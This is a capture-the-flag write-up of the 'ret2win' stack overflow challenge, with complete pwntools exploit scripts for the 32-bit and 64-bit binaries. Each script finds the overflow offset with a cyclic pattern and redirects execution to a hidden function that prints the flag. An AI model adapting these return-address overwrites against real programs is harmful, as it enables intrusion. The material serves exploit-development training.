ret2win

ret2win 32bit

Solution

This is a typical ret2text challenge. There is an unused function ret2win located in the .text segment that calls system("/bin/cat flag.txt") for us. This is sometimes called "dead code".

Exploit

#!/usr/bin/env python3
from pwn import *
#--------Setup--------#
context(arch="i386", os="linux")
elf = ELF("ret2win32", checksec=False)
#--------Offset--------#
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.eip)
log.info(f"{offset = }")
#--------ret2text--------#
ret2win = elf.sym["ret2win"]
payload = flat(
b"A" * offset,
ret2win,
)
p = elf.process()
p.sendlineafter("> ", payload)
p.interactive()

ret2win 64bit

Solution

The idea is essentially the same as the 32-bit case.

Exploit

#!/usr/bin/env python3
from pwn import *
#--------Setup--------#
context(arch="amd64", os="linux")
elf = ELF("ret2win", checksec=False)
#-------Offset--------#
p = elf.process()
pattern = cyclic(1024)
p.sendlineafter("> ", pattern)
p.wait()
core = p.corefile
p.close()
os.remove(core.file.name)
offset = cyclic_find(core.read(core.rsp, 4))
log.info(f"{offset = }")
#--------ret2text--------#
ret2win = elf.sym["ret2win"]
payload = flat(
b"A" * offset,
ret2win,
)
p = elf.process()
p.sendlineafter("> ", payload)
p.interactive()